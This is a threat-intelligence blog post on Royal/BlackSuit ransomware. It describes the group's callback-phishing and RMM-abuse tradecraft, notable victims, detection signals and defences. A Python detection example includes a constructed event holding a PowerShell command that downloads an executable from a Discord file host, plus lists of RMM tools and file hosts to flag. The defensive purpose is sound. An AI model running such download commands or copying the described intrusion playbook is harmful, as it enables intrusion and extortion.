Royal/BlackSuit: The Conti Splinter That Took Dallas Offline
Threat Intelligence
Royal ransomware (now BlackSuit) was the Conti splinter that proved municipal governments were chronically under-defended. The Dallas attack and callback phishing playbook are still active under the new brand.
By Arjun Raghavan, Security & Systems Lead, BIPI · August 15, 2024 · 8 min read
Royal ransomware was the second-most prolific Conti spinoff after Black Basta. The crew rebranded to BlackSuit in mid-2023 but kept the operational tradecraft. The May 2023 attack on the City of Dallas remains one of the most disruptive US municipal government cyber incidents on record, and the BlackSuit successor continues to hit cities, hospitals, and school districts.
Actor Profile
Royal first appeared in September 2022 and was assessed by CISA, FBI, and multiple vendors as a private operation (no broad affiliate program) led by former Conti operators. The June 2023 transition to BlackSuit was confirmed by codebase analysis showing ~98% similarity between Royal and BlackSuit encryptors. The crew is Russian-speaking, with leak site infrastructure operated out of bulletproof hosting providers.
Attribution caveat: Royal/BlackSuit is small enough that operator continuity is plausible to track via code reuse, but no public criminal attribution to specific individuals exists.
TTPs
Royal pioneered the modern callback phishing initial access vector, which has since been adopted by Black Basta, Luna Moth, and other crews.
- Callback phishing: PDF invoices for fake subscription renewals with a phone number for cancellation (MITRE T1566.003)
- Victim calls the number, talks to a fake call center agent, gets walked through installing AnyDesk or Splashtop
- Post-access: Cobalt Strike, then Chisel, NetScan, AdFind for network reconnaissance
- Discord and Reddit-hosted infrastructure for some C2 callbacks (TTP overlap with other Conti splinters)
- Partial encryption (encrypting only a percentage of each file) for speed on large file servers
- Double extortion with leak site, then triple extortion (DDoS) added in late 2023
Notable Victims
City of Dallas (May 2023, disrupted police, courts, and 311 services for weeks), Silverstone Circuit, multiple US school districts, several US county governments, Cleveland Municipal Court, and a string of US healthcare networks. Under the BlackSuit brand, victims have included CDK Global (June 2024, disrupting US car dealerships nationwide), Octapharma Plasma, KADOKAWA, and the City of Coppell, Texas.
Royal did not need to phish a user with a malicious attachment. It got them to call.
Detection Signals
Callback phishing is hard to catch with email security alone because the lure attachment is often a clean PDF. Detection has to extend to phone-call workflows and post-call endpoint behavior.
- PDF invoice attachments from new senders containing a customer-service phone number and no payload
- AnyDesk, Splashtop, or ScreenConnect installation on a user endpoint within 60 minutes of opening such a PDF
- Outbound connections to Cobalt Strike beacon profiles or Chisel SOCKS tunnels
- AdFind, NetScan, or BloodHound-style enumeration from a user workstation
- Discord CDN or Reddit-hosted file downloads via PowerShell on user endpoints
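As an added illustration (not part of the original post or any BIPI tooling), the following Python correlates two of the signals above over constructed endpoint events: an RMM binary starting within 60 minutes of an unknown-sender PDF being opened on the same host, and a PowerShell download from a Discord or Reddit file host. The event schema, the RMM binary names and the file-host list are assumptions for the example.

```python
from datetime import datetime, timedelta
from urllib.parse import urlparse
import re

# Constructed sample endpoint telemetry for illustration (not real data).
EVENTS = [
    {"ts": "2024-05-01T09:02:00", "host": "ws-041", "type": "attachment_open",
     "name": "Invoice_Renewal.pdf", "sender_known": False},
    {"ts": "2024-05-01T09:31:00", "host": "ws-041", "type": "process_start",
     "name": "AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"ts": "2024-05-01T10:10:00", "host": "ws-041", "type": "process_start",
     "name": "powershell.exe",
     "cmdline": "powershell -c iwr https://cdn.discordapp.com/attachments/1/2/c.exe -OutFile c.exe"},
    {"ts": "2024-05-01T11:00:00", "host": "ws-077", "type": "attachment_open",
     "name": "Q2_report.pdf", "sender_known": True},
    {"ts": "2024-05-01T14:00:00", "host": "ws-077", "type": "process_start",
     "name": "AnyDesk.exe", "cmdline": "AnyDesk.exe"},
]

# Assumed binary names; take the real list from your EDR's process inventory.
RMM_BINARIES = {"anydesk.exe", "splashtop.exe", "screenconnect.exe"}
# File-hosting domains the article names as abused for payload delivery.
FILE_HOSTS = {"cdn.discordapp.com", "i.redd.it", "preview.redd.it"}
WINDOW = timedelta(minutes=60)

def detect(events):
    """Return (host, rule, detail) alerts for RMM starts within WINDOW of an
    unknown-sender PDF open, and for PowerShell downloads from FILE_HOSTS."""
    alerts, recent_pdfs = [], {}  # host -> timestamp of last suspicious PDF open
    for e in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if e["type"] == "attachment_open" and e["name"].lower().endswith(".pdf") \
                and not e.get("sender_known", False):
            recent_pdfs[e["host"]] = ts
        elif e["type"] == "process_start":
            name = e["name"].lower()
            if name in RMM_BINARIES and e["host"] in recent_pdfs \
                    and ts - recent_pdfs[e["host"]] <= WINDOW:
                alerts.append((e["host"], "rmm_after_callback_pdf", e["name"]))
            if name == "powershell.exe":
                for url in re.findall(r"https?://\S+", e.get("cmdline", "")):
                    if urlparse(url).hostname in FILE_HOSTS:
                        alerts.append((e["host"], "powershell_filehost_download", url))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

On the sample data ws-041 raises both alerts, while ws-077 (known sender, three-hour gap) raises none, which is the baseline noise this correlation is meant to suppress.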
Defensive Controls
Municipal governments and school districts remain Royal/BlackSuit's preferred targets because the controls below are structurally underfunded in those sectors.
- Train staff that legitimate vendors will never ask them to install remote control software over the phone. Make it a documented policy.
- Block consumer RMM tools (AnyDesk, Splashtop, TeamViewer, ScreenConnect for non-MSP use) at the EDR level by default.
- Filter outbound traffic to Discord CDN and Reddit-hosted attachments from corporate endpoints.
- Apply CISA's #StopRansomware guidance for Royal/BlackSuit specifically: phishing-resistant MFA, segmented backups, validated recovery testing.
- For municipal and SLED sector defenders, engage with MS-ISAC and the StateRAMP/CISA cyber hygiene programs. The free controls cover most of the gap.
Royal became BlackSuit, but the playbook has not changed. The chain of callback phishing, RMM abuse, Cobalt Strike, and double-extortion encryption is now a template used across the post-Conti ecosystem. The defenders best positioned for the next variant are the ones who already treat phone-driven IT support requests as a high-risk channel today.